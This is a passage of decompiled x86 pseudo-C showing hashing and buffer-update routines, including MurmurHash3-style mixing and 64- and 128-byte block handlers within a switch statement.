                                                                      												asm("adc edx, 0x0");
                                                                      												__esp[5] = __edx;
                                                                      												__ebp = 0x10 + __ebp;
                                                                      											} while (__ebp < __esp[6]);
                                                                      											__ebx = __esp[0x11];
                                                                      											 *__esp = __esi;
                                                                      											__eax = __esp[9];
                                                                      											__esp[1] = __edi;
                                                                      											__ecx = __esp[0x10];
                                                                      											__ebx = __esp[0x11] + __esp[9];
                                                                      										}
                                                                      										__eax =  *__esp;
                                                                      										__edx = __esp[1];
                                                                      										 *__ecx =  *__esp;
                                                                      										__eax = __esp[4];
                                                                      										 *(__ecx + 4) = __esp[1];
                                                                      										__edx = __esp[5];
                                                                      										 *(8 + __ecx) = __esp[4];
                                                                      										__eax = __esp[0x12];
                                                                      										 *(__ecx + 0xc) = __esp[5];
                                                                      										__eax = __esp[0x12] & 0x0000000f;
                                                                      										if(__eax != 0) {
                                                                      											__edi = __eax;
                                                                      											__esi = 0x10 + __ecx;
                                                                      											if(__eax >= 4) {
                                                                      												if((__esi & 0x00000001) != 0) {
                                                                      													__edx =  *__ebx & 0x000000ff;
                                                                      													__esi = __ecx + 0x11;
                                                                      													__ebx = __ebx + 1;
                                                                      													__edi = __eax - 1;
                                                                      													 *(0x10 + __ecx) = __dl;
                                                                      												}
                                                                      												if((__esi & 0x00000002) != 0) {
                                                                      													__edx =  *__ebx & 0x0000ffff;
                                                                      													__esi = __esi + 2;
                                                                      													__ebx = __ebx + 2;
                                                                      													__edi = __edi - 2;
                                                                      													 *(__esi - 2) = __dx;
                                                                      												}
                                                                      												if(__edi >= 4) {
                                                                      													 *__esp = __eax;
                                                                      													__ebp = __edi;
                                                                      													__edx = 0;
                                                                      													__ebp = __edi & 0xfffffffc;
                                                                      													do {
                                                                      														__eax =  *(__ebx + __edx);
                                                                      														 *(__esi + __edx) =  *(__ebx + __edx);
                                                                      														__edx = __edx + 4;
                                                                      													} while (__edx < __ebp);
                                                                      													__eax =  *__esp;
                                                                      													__esi = __esi + __edx;
                                                                      													__ebx = __ebx + __edx;
                                                                      												}
                                                                      											}
                                                                      											__edx = 0;
                                                                      											if((__edi & 0x00000002) != 0) {
                                                                      												__edx =  *__ebx & 0x0000ffff;
                                                                      												 *__esi = __dx;
                                                                      												__edx = 2;
                                                                      											}
                                                                      											if(__edi != 0) {
                                                                      												__ebx =  *(__ebx + __edx) & 0x000000ff;
                                                                      												 *(__esi + __edx) = __bl;
                                                                      											}
                                                                      											 *(__ecx + 0x20) = __eax;
                                                                      											__esp =  &(__esp[0xb]);
                                                                      											_pop(__ebx);
                                                                      											_pop(__esi);
                                                                      											_pop(__edi);
                                                                      											_pop(__ebp);
                                                                      											return __eax;
                                                                      										} else {
                                                                      											goto L193;
                                                                      										}
                                                                      									} else {
                                                                      										if(__eax > 0xf) {
                                                                      											L187:
                                                                      											__eax =  *(0x10 + __ecx);
                                                                      											__esi = 0x114253d5;
                                                                      											__ebp =  *(__ecx + 0x14) * 0x114253d5;
                                                                      											 *(__ecx + 0x20) = 0;
                                                                      											__edx = __eax * 0x87c37b91;
                                                                      											__edi =  *(__ecx + 0x14) * 0x114253d5 + __eax * 0x87c37b91;
                                                                      											__edx = __eax * 0x114253d5 >> 0x20;
                                                                      											__eax = __eax * 0x114253d5;
                                                                      											__esi =  *(__ecx + 0x1c) * 0x2745937f;
                                                                      											__edx = __edi + __edx;
                                                                      											__edi = __eax;
                                                                      											__edi = (__eax << 0x00000020 | __edx) << 0x1f;
                                                                      											__ebp = __edx;
                                                                      											__esp[6] = (__eax << 0x00000020 | __edx) << 0x1f;
                                                                      											__ebp = (__edx << 0x00000020 | __eax) << 0x1f;
                                                                      											__eax =  *(__ecx + 0x18);
                                                                      											__esp[7] = __ebp;
                                                                      											__edx = __eax * 0x4cf5ad43;
                                                                      											__esi =  *(__ecx + 0x1c) * 0x2745937f + __eax * 0x4cf5ad43;
                                                                      											__edx = 0x2745937f;
                                                                      											__edx = __eax * 0x2745937f >> 0x20;
                                                                      											__eax = __eax * 0x2745937f;
                                                                      											__edx = __esi + __edx;
                                                                      											__esi = __eax;
                                                                      											__esi = (0x2745937f << 0x00000020 | __eax) >> 0x1f;
                                                                      											__edi = __edx;
                                                                      											__esp[2] = (0x2745937f << 0x00000020 | __eax) >> 0x1f;
                                                                      											__edi = (__eax << 0x00000020 | __edx) >> 0x1f;
                                                                      											__esi = __esp[6];
                                                                      											__esp[3] = (__eax << 0x00000020 | __edx) >> 0x1f;
                                                                      											__edi = __esp[7];
                                                                      											__eax = __esi * 0x4cf5ad43;
                                                                      											__edx = __esp[7] * 0x2745937f;
                                                                      											__edi = __esp[1];
                                                                      											__ebp = __esp[7] * 0x2745937f + __esi * 0x4cf5ad43;
                                                                      											__eax = 0x2745937f;
                                                                      											__edx = 0x2745937f * __esi >> 0x20;
                                                                      											__eax = 0x2745937f * __esi;
                                                                      											__esi =  *__esp;
                                                                      											__edx = __edx + __ebp;
                                                                      											__eax = __eax ^  *__esp;
                                                                      											__edx = __edx ^ __esp[1];
                                                                      											__esi = __eax;
                                                                      											__edi = __esp[2];
                                                                      											__eax = (__eax << 0x00000020 | __edx) << 0x1b;
                                                                      											__ebp = 5;
                                                                      											__edx = (__edx << 0x00000020 | __esi) << 0x1b;
                                                                      											__eax = __eax + __esp[4];
                                                                      											asm("adc edx, [esp+0x14]");
                                                                      											__esi = __edx + __edx * 4;
                                                                      											__edx = __eax * 5 >> 0x20;
                                                                      											__eax = __eax * 5;
                                                                      											__ebp = __esp[3];
                                                                      											__edx = __esi + __edx;
                                                                      											 *__esp = __eax;
                                                                      											asm("adc edx, 0x0");
                                                                      											__esp[1] = __edx;
                                                                      											__eax = __edi * 0x87c37b91;
                                                                      											__edx = __esp[3] * 0x114253d5;
                                                                      											__ebp = __esp[4];
                                                                      											__esi = __esp[3] * 0x114253d5 + __edi * 0x87c37b91;
                                                                      											__eax = __edi;
                                                                      											__edi = 0x114253d5;
                                                                      											__edx = __eax * 0x114253d5 >> 0x20;
                                                                      											__eax = __eax * 0x114253d5;
                                                                      											__edi = 5;
                                                                      											__edx = __esi + __edx;
                                                                      											__esi = __esp[5];
                                                                      											__eax = __eax ^ __esp[4];
                                                                      											__ebp = __eax;
                                                                      											__edx = __edx ^ __esp[5];
                                                                      											__eax = (__eax << 0x00000020 | __edx) << 0x1f;
                                                                      											__edx = (__edx << 0x00000020 | __ebp) << 0x1f;
                                                                      											__eax = __eax +  *__esp;
                                                                      											asm("adc edx, [esp+0x4]");
                                                                      											__ebp = __edx + __edx * 4;
                                                                      											__edx = __eax * 5 >> 0x20;
                                                                      											__eax = __eax * 5;
                                                                      											__edx = __edx + __ebp;
                                                                      											__esp[4] = __eax;
                                                                      											asm("adc edx, 0x0");
                                                                      											__esp[5] = __edx;
                                                                      											goto L188;
                                                                      										} else {
                                                                      											__edi = __eax + 1;
                                                                      											__ebp = __esp[0x12];
                                                                      											 *(__ecx + 0x20) = __edi;
                                                                      											__edx =  *__ebx & 0x000000ff;
                                                                      											__ebp = __esp[0x12] - 1;
                                                                      											 *(__ecx + __eax + 0x10) = __dl;
                                                                      											if(__ebp == 0) {
                                                                      												goto L193;
                                                                      											} else {
                                                                      												if(__edi == 0x10) {
                                                                      													__esp[0x12] = __ebp;
                                                                      													__ebx = __ebx + 1;
                                                                      													goto L187;
                                                                      												} else {
                                                                      													__ebp = __eax + 2;
                                                                      													 *(__ecx + 0x20) = __ebp;
                                                                      													__edx =  *(__ebx + 1) & 0x000000ff;
                                                                      													 *(__ecx + __edi + 0x10) = __dl;
                                                                      													__edx = __esp[0x12];
                                                                      													__edx = __esp[0x12] - 2;
                                                                      													if(__edx == 0) {
                                                                      														goto L193;
                                                                      													} else {
                                                                      														if(__ebp == 0x10) {
                                                                      															__esp[0x12] = __edx;
                                                                      															__ebx = __ebx + 2;
                                                                      															goto L187;
                                                                      														} else {
                                                                      															__edi = __eax + 3;
                                                                      															 *(__ecx + 0x20) = __edi;
                                                                      															__edx =  *(__ebx + 2) & 0x000000ff;
                                                                      															 *(__ecx + 0x10 + __ebp) = __dl;
                                                                      															__ebp = __esp[0x12];
                                                                      															__ebp = __esp[0x12] - 3;
                                                                      															if(__ebp == 0) {
                                                                      																goto L193;
                                                                      															} else {
                                                                      																if(__edi == 0x10) {
                                                                      																	__esp[0x12] = __ebp;
                                                                      																	__ebx = __ebx + 3;
                                                                      																	goto L187;
                                                                      																} else {
                                                                      																	__ebp = __eax + 4;
                                                                      																	 *(__ecx + 0x20) = __ebp;
                                                                      																	__edx =  *(__ebx + 3) & 0x000000ff;
                                                                      																	 *(__ecx + __edi + 0x10) = __dl;
                                                                      																	__edx = __esp[0x12];
                                                                      																	__edx = __esp[0x12] - 4;
                                                                      																	if(__edx == 0) {
                                                                      																		goto L193;
                                                                      																	} else {
                                                                      																		if(__ebp == 0x10) {
                                                                      																			__esp[0x12] = __edx;
                                                                      																			__ebx = __ebx + 4;
                                                                      																			goto L187;
                                                                      																		} else {
                                                                      																			__edi = __eax + 5;
                                                                      																			 *(__ecx + 0x20) = __edi;
                                                                      																			__edx =  *(__ebx + 4) & 0x000000ff;
                                                                      																			 *(__ecx + 0x10 + __ebp) = __dl;
                                                                      																			__ebp = __esp[0x12];
                                                                      																			__ebp = __esp[0x12] - 5;
                                                                      																			if(__ebp == 0) {
                                                                      																				goto L193;
                                                                      																			} else {
                                                                      																				if(__edi == 0x10) {
                                                                      																					__esp[0x12] = __ebp;
                                                                      																					__ebx = 5 + __ebx;
                                                                      																					goto L187;
                                                                      																				} else {
                                                                      																					__ebp = __eax + 6;
                                                                      																					 *(__ecx + 0x20) = __ebp;
                                                                      																					__edx =  *(5 + __ebx) & 0x000000ff;
                                                                      																					 *(__ecx + __edi + 0x10) = __dl;
                                                                      																					__edx = __esp[0x12];
                                                                      																					__edx = __esp[0x12] - 6;
                                                                      																					if(__edx == 0) {
                                                                      																						goto L193;
                                                                      																					} else {
                                                                      																						if(__ebp == 0x10) {
                                                                      																							__esp[0x12] = __edx;
                                                                      																							__ebx = __ebx + 6;
                                                                      																							goto L187;
                                                                      																						} else {
                                                                      																							__edi = __eax + 7;
                                                                      																							 *(__ecx + 0x20) = __edi;
                                                                      																							__edx =  *(__ebx + 6) & 0x000000ff;
                                                                      																							 *(__ecx + 0x10 + __ebp) = __dl;
                                                                      																							__ebp = __esp[0x12];
                                                                      																							__ebp = __esp[0x12] - 7;
                                                                      																							if(__ebp == 0) {
                                                                      																								goto L193;
                                                                      																							} else {
                                                                      																								if(__edi == 0x10) {
                                                                      																									__esp[0x12] = __ebp;
                                                                      																									__ebx = __ebx + 7;
                                                                      																									goto L187;
                                                                      																								} else {
                                                                      																									__ebp = __eax + 8;
                                                                      																									 *(__ecx + 0x20) = __ebp;
                                                                      																									__edx =  *(__ebx + 7) & 0x000000ff;
                                                                      																									 *(__ecx + __edi + 0x10) = __dl;
                                                                      																									__edx = __esp[0x12];
                                                                      																									__edx = __esp[0x12] - 8;
                                                                      																									if(__edx == 0) {
                                                                      																										goto L193;
                                                                      																									} else {
                                                                      																										if(__ebp == 0x10) {
                                                                      																											__esp[0x12] = __edx;
                                                                      																											__ebx = 8 + __ebx;
                                                                      																											goto L187;
                                                                      																										} else {
                                                                      																											__edi = __eax + 9;
                                                                      																											 *(__ecx + 0x20) = __edi;
                                                                      																											__edx =  *(8 + __ebx) & 0x000000ff;
                                                                      																											 *(__ecx + 0x10 + __ebp) = __dl;
                                                                      																											__ebp = __esp[0x12];
                                                                      																											__ebp = __esp[0x12] - 9;
                                                                      																											if(__ebp == 0) {
                                                                      																												goto L193;
                                                                      																											} else {
                                                                      																												if(__edi == 0x10) {
                                                                      																													__esp[0x12] = __ebp;
                                                                      																													__ebx = __ebx + 9;
                                                                      																													goto L187;
                                                                      																												} else {
                                                                      																													__ebp = __eax + 0xa;
                                                                      																													 *(__ecx + 0x20) = __ebp;
                                                                      																													__edx =  *(__ebx + 9) & 0x000000ff;
                                                                      																													 *(__ecx + __edi + 0x10) = __dl;
                                                                      																													__edx = __esp[0x12];
                                                                      																													__edx = __esp[0x12] - 0xa;
                                                                      																													if(__edx == 0) {
                                                                      																														goto L193;
                                                                      																													} else {
                                                                      																														if(__ebp == 0x10) {
                                                                      																															__esp[0x12] = __edx;
                                                                      																															__ebx = __ebx + 0xa;
                                                                      																															goto L187;
                                                                      																														} else {
                                                                      																															__edi = __eax + 0xb;
                                                                      																															 *(__ecx + 0x20) = __edi;
                                                                      																															__edx =  *(__ebx + 0xa) & 0x000000ff;
                                                                      																															 *(__ecx + 0x10 + __ebp) = __dl;
                                                                      																															__ebp = __esp[0x12];
                                                                      																															__ebp = __esp[0x12] - 0xb;
                                                                      																															if(__ebp == 0) {
                                                                      																																goto L193;
                                                                      																															} else {
                                                                      																																if(__edi == 0x10) {
                                                                      																																	__esp[0x12] = __ebp;
                                                                      																																	__ebx = __ebx + 0xb;
                                                                      																																	goto L187;
                                                                      																																} else {
                                                                      																																	__ebp = __eax + 0xc;
                                                                      																																	 *(__ecx + 0x20) = __ebp;
                                                                      																																	__edx =  *(__ebx + 0xb) & 0x000000ff;
                                                                      																																	 *(__ecx + __edi + 0x10) = __dl;
                                                                      																																	__edx = __esp[0x12];
                                                                      																																	__edx = __esp[0x12] - 0xc;
                                                                      																																	if(__edx == 0) {
                                                                      																																		goto L193;
                                                                      																																	} else {
                                                                      																																		if(__ebp == 0x10) {
                                                                      																																			__esp[0x12] = __edx;
                                                                      																																			__ebx = __ebx + 0xc;
                                                                      																																			goto L187;
                                                                      																																		} else {
                                                                      																																			__edi = __eax + 0xd;
                                                                      																																			 *(__ecx + 0x20) = __edi;
                                                                      																																			__edx =  *(__ebx + 0xc) & 0x000000ff;
                                                                      																																			 *(__ecx + 0x10 + __ebp) = __dl;
                                                                      																																			__ebp = __esp[0x12];
                                                                      																																			__ebp = __esp[0x12] - 0xd;
                                                                      																																			if(__ebp == 0) {
                                                                      																																				goto L193;
                                                                      																																			} else {
                                                                      																																				if(__edi == 0x10) {
                                                                      																																					__esp[0x12] = __ebp;
                                                                      																																					__ebx = __ebx + 0xd;
                                                                      																																					goto L187;
                                                                      																																				} else {
                                                                      																																					__eax = __eax + 0xe;
                                                                      																																					 *(__ecx + 0x20) = __eax;
                                                                      																																					__edx =  *(__ebx + 0xd) & 0x000000ff;
                                                                      																																					 *(__ecx + __edi + 0x10) = __dl;
                                                                      																																					__edx = __esp[0x12];
                                                                      																																					__edx = __esp[0x12] - 0xe;
                                                                      																																					if(__edx == 0) {
                                                                      																																						goto L193;
                                                                      																																					} else {
                                                                      																																						if(__eax != 0xf) {
                                                                      																																							__esp[0x12] = __edx;
                                                                      																																							__ebx = __ebx + 0xe;
                                                                      																																							goto L187;
                                                                      																																						} else {
                                                                      																																							 *(__ecx + 0x20) = 0x10;
                                                                      																																							__edx = __ebx + 0xf;
                                                                      																																							__eax =  *(__ebx + 0xe) & 0x000000ff;
                                                                      																																							_t394 =  &(__esp[0x12]);
                                                                      																																							 *_t394 = __esp[0x12] - 0xf;
                                                                      																																							 *(__ecx + 0x1f) = __al;
                                                                      																																							if( *_t394 == 0) {
                                                                      																																								goto L193;
                                                                      																																							} else {
                                                                      																																								__ebx = __edx;
                                                                      																																								goto L187;
                                                                      																																							}
                                                                      																																						}
                                                                      																																					}
                                                                      																																				}
                                                                      																																			}
                                                                      																																		}
                                                                      																																	}
                                                                      																																}
                                                                      																															}
                                                                      																														}
                                                                      																													}
                                                                      																												}
                                                                      																											}
                                                                      																										}
                                                                      																									}
                                                                      																								}
                                                                      																							}
                                                                      																						}
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								goto L457;
                                                                      							case 0x17:
                                                                      								__esp[0xa] = __ecx;
                                                                      								__esp[9] = __edx;
                                                                      								__eax =  *__ebx;
                                                                      								__ebx = __esp[6];
                                                                      								__esp[8] = __eax;
                                                                      								__esp =  &(__esp[7]);
                                                                      								_push(__ebp);
                                                                      								__edx = 0;
                                                                      								_push(__edi);
                                                                      								_push(__esi);
                                                                      								_push(__ebx);
                                                                      								__esp = __esp - 0x2c;
                                                                      								__esi = __esp[0x10];
                                                                      								__ebx = __esp[0x12];
                                                                      								__edi =  *(__esi + 8);
                                                                      								__eax = __ebx;
                                                                      								__edi =  *(__esi + 8) & 0x0000003f;
                                                                      								__eax = __ebx +  *(__esi + 8);
                                                                      								asm("adc edx, [esi+0xc]");
                                                                      								 *(__esi + 8) = __ebx +  *(__esi + 8);
                                                                      								__eax = 0x40;
                                                                      								__eax = 0x40 - __edi;
                                                                      								 *(__esi + 0xc) = 0;
                                                                      								__edx = __edi + 0x10;
                                                                      								if(__ebx >= 0x40) {
                                                                      									__ecx = __esp[0x11];
                                                                      									__ebp = __esi + __edx;
                                                                      									__esp[5] = 0x40;
                                                                      									if(0x40 >= 4) {
                                                                      										if((__ebp & 0x00000001) != 0) {
                                                                      											__ecx =  *__ecx & 0x000000ff;
                                                                      											_t791 = __eax - 1; // 0x3f
                                                                      											__edx = _t791;
                                                                      											__ebp = __ebp + 1;
                                                                      											 *(__ebp - 1) = __cl;
                                                                      											__esp[5] = _t791;
                                                                      											__ecx = __esp[0x11];
                                                                      											__ecx = __esp[0x11] + 1;
                                                                      										}
                                                                      										if((__ebp & 0x00000002) != 0) {
                                                                      											__edx =  *__ecx & 0x0000ffff;
                                                                      											__ebp = __ebp + 2;
                                                                      											__ecx = __ecx + 2;
                                                                      											 *(__ebp - 2) = __dx;
                                                                      											__esp[5] = __esp[5] - 2;
                                                                      										}
                                                                      										__edx = __esp[5];
                                                                      										if(__edx >= 4) {
                                                                      											__esp[7] = __eax;
                                                                      											__esp[6] = __edx;
                                                                      											__edx = 0;
                                                                      											__esp[0x12] = __ebx;
                                                                      											__eax = __esp[6];
                                                                      											do {
                                                                      												__ebx =  *(__ecx + __edx);
                                                                      												 *(__ebp + __edx) =  *(__ecx + __edx);
                                                                      												__edx = __edx + 4;
                                                                      											} while (__edx < __eax);
                                                                      											__eax = __esp[7];
                                                                      											__ebp = __ebp + __edx;
                                                                      											__ecx = __ecx + __edx;
                                                                      											__ebx = __esp[0x12];
                                                                      										}
                                                                      									}
                                                                      									__edx = 0;
                                                                      									if((__esp[5] & 0x00000002) != 0) {
                                                                      										__edx =  *__ecx & 0x0000ffff;
                                                                      										 *__ebp = __dx;
                                                                      										__edx = 2;
                                                                      										if((__esp[5] & 0x00000001) != 0) {
                                                                      											goto L258;
                                                                      										}
                                                                      									} else {
                                                                      										if((__esp[5] & 0x00000001) != 0) {
                                                                      											L258:
                                                                      											__ecx =  *(__ecx + __edx) & 0x000000ff;
                                                                      											 *(__ebp + __edx) = __cl;
                                                                      										}
                                                                      									}
                                                                      									__esp[5] = __eax;
                                                                      									__edx = __esi + 0x10;
                                                                      									__esp[1] = __esi + 0x10;
                                                                      									__ebp = __esi + 0x50;
                                                                      									 *__esp = __ebp;
                                                                      									__ebx = __edi + __ebx - 0x40;
                                                                      									 *((intOrPtr*)(__esi + 0x78))() = __esp[5];
                                                                      									__edx = __ebx;
                                                                      									__esp[0x11] = __esp[0x11] + __esp[5];
                                                                      									__edx = __ebx & 0xffffffc0;
                                                                      									__ebx = __ebx & 0x0000003f;
                                                                      									__eax = __esp[0x11];
                                                                      									__eax = __esp[0x11] + __edx;
                                                                      									if(__esp[0x11] >= __eax) {
                                                                      										__edx = 0x10;
                                                                      									} else {
                                                                      										__esp[0x12] = __ebx;
                                                                      										__edi = __esp[0x11];
                                                                      										__esp[5] = __edx;
                                                                      										__ebx = __esp[0x11];
                                                                      										__edi = __eax;
                                                                      										do {
                                                                      											__esp[1] = __ebx;
                                                                      											__ebx = 0x40 + __ebx;
                                                                      											 *__esp = __ebp;
                                                                      											__eax =  *((intOrPtr*)(__esi + 0x78))();
                                                                      										} while (__ebx < __edi);
                                                                      										__edx = __esp[5];
                                                                      										__esp[0x11] = __esp[0x11] + __esp[5];
                                                                      										__edx = 0x10;
                                                                      										__ebx = __esp[0x12];
                                                                      									}
                                                                      								}
                                                                      								__eax = __esp[0x11];
                                                                      								__ecx = __esi + __edx;
                                                                      								if(__ebx >= 4) {
                                                                      									if((__cl & 0x00000001) != 0) {
                                                                      										__edx =  *__eax & 0x000000ff;
                                                                      										__ecx = __ecx + 1;
                                                                      										__eax = __eax + 1;
                                                                      										__ebx = __ebx - 1;
                                                                      										 *(__ecx - 1) = __dl;
                                                                      									}
                                                                      									if((__cl & 0x00000002) != 0) {
                                                                      										__edi =  *__eax & 0x0000ffff;
                                                                      										__ecx = __ecx + 2;
                                                                      										__eax = __eax + 2;
                                                                      										__ebx = __ebx - 2;
                                                                      										 *(__ecx - 2) = __di;
                                                                      									}
                                                                      									if(__ebx >= 4) {
                                                                      										__edi = __ebx;
                                                                      										__edx = 0;
                                                                      										__edi = __ebx & 0xfffffffc;
                                                                      										do {
                                                                      											__esi =  *(__eax + __edx);
                                                                      											 *(__ecx + __edx) =  *(__eax + __edx);
                                                                      											__edx = __edx + 4;
                                                                      										} while (__edx < __edi);
                                                                      										__ecx = __ecx + __edx;
                                                                      										__eax = __eax + __edx;
                                                                      									}
                                                                      								}
                                                                      								__edx = 0;
                                                                      								if((__bl & 0x00000002) != 0) {
                                                                      									__esi =  *__eax & 0x0000ffff;
                                                                      									__edx = 2;
                                                                      									 *__ecx = __si;
                                                                      									if((__bl & 0x00000001) == 0) {
                                                                      										goto L241;
                                                                      									} else {
                                                                      										goto L242;
                                                                      									}
                                                                      								} else {
                                                                      									if((__bl & 0x00000001) != 0) {
                                                                      										L242:
                                                                      										__eax =  *(__eax + __edx) & 0x000000ff;
                                                                      										 *(__ecx + __edx) = __al;
                                                                      										__esp =  &(__esp[0xb]);
                                                                      										_pop(__ebx);
                                                                      										_pop(__esi);
                                                                      										_pop(__edi);
                                                                      										_pop(__ebp);
                                                                      										return __eax;
                                                                      									} else {
                                                                      										L241:
                                                                      										__esp =  &(__esp[0xb]);
                                                                      										_pop(__ebx);
                                                                      										_pop(__esi);
                                                                      										_pop(__edi);
                                                                      										_pop(__ebp);
                                                                      										return __eax;
                                                                      									}
                                                                      								}
                                                                      								goto L457;
                                                                      							case 0x18:
                                                                      								__esp[0xa] = __ecx;
                                                                      								__esp[9] = __edx;
                                                                      								__eax =  *__ebx;
                                                                      								__ebx = __esp[6];
                                                                      								__esp[8] = __eax;
                                                                      								__esp =  &(__esp[7]);
                                                                      								_push(__ebp);
                                                                      								__edx = 0;
                                                                      								_push(__edi);
                                                                      								_push(__esi);
                                                                      								_push(__ebx);
                                                                      								__esp = __esp - 0x2c;
                                                                      								__esi = __esp[0x10];
                                                                      								__ebx = __esp[0x12];
                                                                      								__edi =  *(__esi + 8);
                                                                      								__eax = __ebx;
                                                                      								__edi =  *(__esi + 8) & 0x0000003f;
                                                                      								__eax = __ebx +  *(__esi + 8);
                                                                      								asm("adc edx, [esi+0xc]");
                                                                      								 *(__esi + 8) = __ebx +  *(__esi + 8);
                                                                      								__eax = 0x40;
                                                                      								__eax = 0x40 - __edi;
                                                                      								 *(__esi + 0xc) = 0;
                                                                      								__edx = __edi + 0x10;
                                                                      								if(__ebx >= 0x40) {
                                                                      									__ecx = __esp[0x11];
                                                                      									__ebp = __esi + __edx;
                                                                      									__esp[5] = 0x40;
                                                                      									if(0x40 >= 4) {
                                                                      										if((__ebp & 0x00000001) != 0) {
                                                                      											__ecx =  *__ecx & 0x000000ff;
                                                                      											_t918 = __eax - 1; // 0x3f
                                                                      											__edx = _t918;
                                                                      											__ebp = __ebp + 1;
                                                                      											 *(__ebp - 1) = __cl;
                                                                      											__esp[5] = _t918;
                                                                      											__ecx = __esp[0x11];
                                                                      											__ecx = __esp[0x11] + 1;
                                                                      										}
                                                                      										if((__ebp & 0x00000002) != 0) {
                                                                      											__edx =  *__ecx & 0x0000ffff;
                                                                      											__ebp = __ebp + 2;
                                                                      											__ecx = __ecx + 2;
                                                                      											 *(__ebp - 2) = __dx;
                                                                      											__esp[5] = __esp[5] - 2;
                                                                      										}
                                                                      										__edx = __esp[5];
                                                                      										if(__edx >= 4) {
                                                                      											__esp[7] = __eax;
                                                                      											__esp[6] = __edx;
                                                                      											__edx = 0;
                                                                      											__esp[0x12] = __ebx;
                                                                      											__eax = __esp[6];
                                                                      											do {
                                                                      												__ebx =  *(__ecx + __edx);
                                                                      												 *(__ebp + __edx) =  *(__ecx + __edx);
                                                                      												__edx = __edx + 4;
                                                                      											} while (__edx < __eax);
                                                                      											__eax = __esp[7];
                                                                      											__ebp = __ebp + __edx;
                                                                      											__ecx = __ecx + __edx;
                                                                      											__ebx = __esp[0x12];
                                                                      										}
                                                                      									}
                                                                      									__edx = 0;
                                                                      									if((__esp[5] & 0x00000002) != 0) {
                                                                      										__edx =  *__ecx & 0x0000ffff;
                                                                      										 *__ebp = __dx;
                                                                      										__edx = 2;
                                                                      										if((__esp[5] & 0x00000001) != 0) {
                                                                      											goto L311;
                                                                      										}
                                                                      									} else {
                                                                      										if((__esp[5] & 0x00000001) != 0) {
                                                                      											L311:
                                                                      											__ecx =  *(__ecx + __edx) & 0x000000ff;
                                                                      											 *(__ebp + __edx) = __cl;
                                                                      										}
                                                                      									}
                                                                      									__esp[5] = __eax;
                                                                      									__edx = __esi + 0x10;
                                                                      									__esp[1] = __esi + 0x10;
                                                                      									__ebp = __esi + 0x50;
                                                                      									 *__esp = __ebp;
                                                                      									__ebx = __edi + __ebx - 0x40;
                                                                      									 *(__esi + 0x70)() = __esp[5];
                                                                      									__edx = __ebx;
                                                                      									__esp[0x11] = __esp[0x11] + __esp[5];
                                                                      									__edx = __ebx & 0xffffffc0;
                                                                      									__ebx = __ebx & 0x0000003f;
                                                                      									__eax = __esp[0x11];
                                                                      									__eax = __esp[0x11] + __edx;
                                                                      									if(__esp[0x11] >= __eax) {
                                                                      										__edx = 0x10;
                                                                      									} else {
                                                                      										__esp[0x12] = __ebx;
                                                                      										__edi = __esp[0x11];
                                                                      										__esp[5] = __edx;
                                                                      										__ebx = __esp[0x11];
                                                                      										__edi = __eax;
                                                                      										do {
                                                                      											__esp[1] = __ebx;
                                                                      											__ebx = 0x40 + __ebx;
                                                                      											 *__esp = __ebp;
                                                                      											__eax =  *(__esi + 0x70)();
                                                                      										} while (__ebx < __edi);
                                                                      										__edx = __esp[5];
                                                                      										__esp[0x11] = __esp[0x11] + __esp[5];
                                                                      										__edx = 0x10;
                                                                      										__ebx = __esp[0x12];
                                                                      									}
                                                                      								}
                                                                      								__eax = __esp[0x11];
                                                                      								__ecx = __esi + __edx;
                                                                      								if(__ebx >= 4) {
                                                                      									if((__cl & 0x00000001) != 0) {
                                                                      										__edx =  *__eax & 0x000000ff;
                                                                      										__ecx = __ecx + 1;
                                                                      										__eax = __eax + 1;
                                                                      										__ebx = __ebx - 1;
                                                                      										 *(__ecx - 1) = __dl;
                                                                      									}
                                                                      									if((__cl & 0x00000002) != 0) {
                                                                      										__edi =  *__eax & 0x0000ffff;
                                                                      										__ecx = __ecx + 2;
                                                                      										__eax = __eax + 2;
                                                                      										__ebx = __ebx - 2;
                                                                      										 *(__ecx - 2) = __di;
                                                                      									}
                                                                      									if(__ebx >= 4) {
                                                                      										__edi = __ebx;
                                                                      										__edx = 0;
                                                                      										__edi = __ebx & 0xfffffffc;
                                                                      										do {
                                                                      											__esi =  *(__eax + __edx);
                                                                      											 *(__ecx + __edx) =  *(__eax + __edx);
                                                                      											__edx = __edx + 4;
                                                                      										} while (__edx < __edi);
                                                                      										__ecx = __ecx + __edx;
                                                                      										__eax = __eax + __edx;
                                                                      									}
                                                                      								}
                                                                      								__edx = 0;
                                                                      								if((__bl & 0x00000002) != 0) {
                                                                      									__esi =  *__eax & 0x0000ffff;
                                                                      									__edx = 2;
                                                                      									 *__ecx = __si;
                                                                      									if((__bl & 0x00000001) == 0) {
                                                                      										goto L294;
                                                                      									} else {
                                                                      										goto L295;
                                                                      									}
                                                                      								} else {
                                                                      									if((__bl & 0x00000001) != 0) {
                                                                      										L295:
                                                                      										__eax =  *(__eax + __edx) & 0x000000ff;
                                                                      										 *(__ecx + __edx) = __al;
                                                                      										__esp =  &(__esp[0xb]);
                                                                      										_pop(__ebx);
                                                                      										_pop(__esi);
                                                                      										_pop(__edi);
                                                                      										_pop(__ebp);
                                                                      										return __eax;
                                                                      									} else {
                                                                      										L294:
                                                                      										__esp =  &(__esp[0xb]);
                                                                      										_pop(__ebx);
                                                                      										_pop(__esi);
                                                                      										_pop(__edi);
                                                                      										_pop(__ebp);
                                                                      										return __eax;
                                                                      									}
                                                                      								}
                                                                      								goto L457;
                                                                      							case 0x19:
                                                                      								__esp[0xa] = __ecx;
                                                                      								__esp[9] = __edx;
                                                                      								__eax =  *__ebx;
                                                                      								__ebx = __esp[6];
                                                                      								__esp[8] = __eax;
                                                                      								__esp =  &(__esp[7]);
                                                                      								_push(__ebp);
                                                                      								__edx = 0;
                                                                      								_push(__edi);
                                                                      								_push(__esi);
                                                                      								__esi = 0x80;
                                                                      								_push(__ebx);
                                                                      								__esp = __esp - 0x14;
                                                                      								__edi = __esp[0xa];
                                                                      								__ebx = __esp[0xc];
                                                                      								__ecx =  *(__edi + 8);
                                                                      								__eax = __ebx;
                                                                      								__ecx =  *(__edi + 8) & 0x0000007f;
                                                                      								__eax = __ebx +  *(__edi + 8);
                                                                      								asm("adc edx, [edi+0xc]");
                                                                      								__esi = 0x80 - __ecx;
                                                                      								 *(__edi + 8) = __ebx +  *(__edi + 8);
                                                                      								__eax = 0x10 + __ecx;
                                                                      								 *(__edi + 0xc) = 0;
